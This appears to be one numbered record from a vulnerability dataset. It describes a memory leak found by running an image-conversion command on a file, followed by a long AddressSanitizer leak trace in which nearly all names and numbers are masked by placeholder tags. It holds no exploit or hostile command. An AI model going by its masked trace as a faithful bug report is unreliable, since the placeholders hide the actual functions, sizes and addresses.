  8640. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick convert $FILE out.msl APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe NUMBERTAG d0b NUMBERTAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df1dd in realloc APITAG NUMBERTAG f1fe7aa NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7aa NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec5eba in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df1dd in realloc APITAG NUMBERTAG f1fe7aa NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7aa NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec5f5f in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df1dd in realloc APITAG NUMBERTAG f1fe7aa NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7aa NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec5d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG 
NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df1dd in realloc APITAG NUMBERTAG f1fe7aa NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7aa NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec5e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df NUMBERTAG in posix_memalign APITAG NUMBERTAG f1fe7a9ecb2 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG df in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG ada9 in APITAG APITAG NUMBERTAG f1fe7a5a NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4ac NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4d NUMBERTAG in APITAG 
APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG f in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4ac NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4ac NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG in APITAG APITAG NUMBERTAG 
f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG a3 in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4cd NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG a3 in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee 
NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG a3 in APITAG APITAG NUMBERTAG f1fe7ec4c1d in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG a3 in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4cd NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG a3 in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e1c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in 
APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG a3 in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG b in APITAG APITAG NUMBERTAG f1fe6f2c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG fb NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4b NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG fb NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4b NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec4d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in 
APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG fb NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4b NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG a1 in APITAG APITAG NUMBERTAG f1fe7ec4ca8 in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG a1 in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG b in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d 
NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG defdd in calloc APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bed NUMBERTAG in APITAG splay APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d0fa4 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG bdc0 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e2b in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect 
leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7ade5fa in APITAG APITAG NUMBERTAG f1fe7ade7d4 in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG f6 in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7ade5fa in APITAG APITAG NUMBERTAG f1fe7a4b NUMBERTAG b in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7ade5fa in APITAG APITAG NUMBERTAG f1fe7a4b NUMBERTAG b in APITAG APITAG NUMBERTAG f1fe7ec4d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f 
NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7ade5fa in APITAG APITAG NUMBERTAG f1fe7a4b NUMBERTAG b in APITAG APITAG NUMBERTAG f1fe NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b in __strdup APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG dc in APITAG APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG da7fd in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG af in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG 
in APITAG APITAG NUMBERTAG f1fe NUMBERTAG da7fd in APITAG APITAG NUMBERTAG f1fe7a4b6b1 in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG da7fd in APITAG APITAG NUMBERTAG f1fe7a4b6b1 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG da7fd in APITAG APITAG NUMBERTAG f1fe7a4b6b1 in APITAG APITAG NUMBERTAG f1fe7ec4d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG 
f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7beda NUMBERTAG in APITAG splay APITAG NUMBERTAG f1fe7bed NUMBERTAG in APITAG splay APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main 